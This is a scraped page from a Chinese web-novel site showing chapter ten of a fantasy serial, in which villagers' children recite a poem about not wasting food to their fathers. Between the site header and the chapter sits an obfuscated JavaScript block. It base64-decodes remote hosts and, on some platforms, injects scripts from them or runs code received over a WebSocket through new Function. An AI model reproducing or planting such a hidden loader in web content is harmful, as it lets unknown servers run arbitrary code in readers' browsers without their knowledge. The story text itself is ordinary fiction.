宜小说

字:
关灯 护眼
宜小说 > 诡异世界生存手册 > 第十章:余波
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第十章:余波

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
在一间茅草屋中,一个身体壮实的小孩不停嘀咕着什么。
  “锄禾日当午,汗滴禾下土。谁知盘中餐,粒粒皆辛苦。”小孩手指在桌子上画着什么不停地嘀嘀咕咕着。
  “你在做什么,总是嘀嘀咕咕的。”一名身穿短打汗衫的青年人问道。这人正是今天递给李思柴刀的那个人。
  “爹,俺以后再也不浪费粮食了。”这小孩一脸认真向青年人说道。
  “哦?”青年人惊讶了一声,要知道他这儿子平常吃饭一点都不省心,每次都有饭剩下来。每次剩下饭菜他都是拿竹条抽,但一直都没有长记性。想到这不由问道:“曹猛,可是今天先生教了你什么?”
  “嗯。”曹猛肯定的点了点头,说道:“先生教我了一首诗。”
  青年人了然,他对李相公非常了解,平常没事的时候就会开讲堂给孩童启蒙讲学。从来也不收钱。就算有人要给他钱,他都推辞了。
  这一点在这个世界是非常难得的,很多读书人其实都是看不起他们这些人,更何况给他们孩子启蒙呢。他曹庆是一个明事理的人,也分得清好歹。所以他对于李思是非常敬仰的,这也是今天为什么他第一个站出来献刀。
  “那你背给我听听。”曹庆拿起了座上的茶壶,在桌上的陶碗倒了杯水,等着曹猛把诗词背给他听。
  曹猛听到曹庆这么说,不由挺起胸来,用李思在课堂上那种朗诵的方式读道:“锄禾日当午,汗滴禾下土。谁知盘中餐,粒粒皆辛苦。”
  听到曹猛背的诗词,曹庆拿着的陶碗不由一顿,细细品味一番,却是觉得自己也是看得懂这首诗,只觉得这几句诗虽然简单,却让人振聋发聩。不由叹道:“李先生是一名知道人间疾苦的读书人啊。”
  ……
  在县城的另一角,一家人正在吃饭,烛火把房中照的通亮,其中身材肥胖,满脸横肉的大汉正在大快朵颐,而一旁比这个大胖子小了几个型号的小胖子正在目不转睛的看着大胖子吃饭。这小胖子就是喻虎,而这大胖子就是他爹喻屠夫喻三。
  “你看个啥子看,没看过你爹我吃饭啊?”喻三感觉自己儿子一直盯着自己吃饭,眼神怪怪的,让他心里有些毛毛的。
  “没啥子。爹,你继续吃。”喻虎慢悠悠的吃起饭来,只是余光不时看向他父亲。
  “不吃了,不吃了!”喻三顿时有些生气的把筷子往桌上一搁,就不准备吃了。
  见到他不吃了,这小喻虎精神起来了,指责道:“李先生今天说了,谁知盘中餐,粒粒皆辛苦,粮食来之不易,咋的说不吃就不吃啊!”
  “哎呦!”喻三怪叫一声,也是明白这小子是想给自己上课呢。便坐了下来,嘿了一声,对着他媳妇道道:“那我今天把这个饭给吃完,不过以后你要是敢给我浪费粮食,看老子不把你屁股打烂。”
  说完就快速的吃了起来,不一会儿就把饭给吃完了。吃完了后双手交叉在胸前,好整以暇的看着这个小胖子。看得喻虎心中发毛,这饭愣是吃不下去了。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师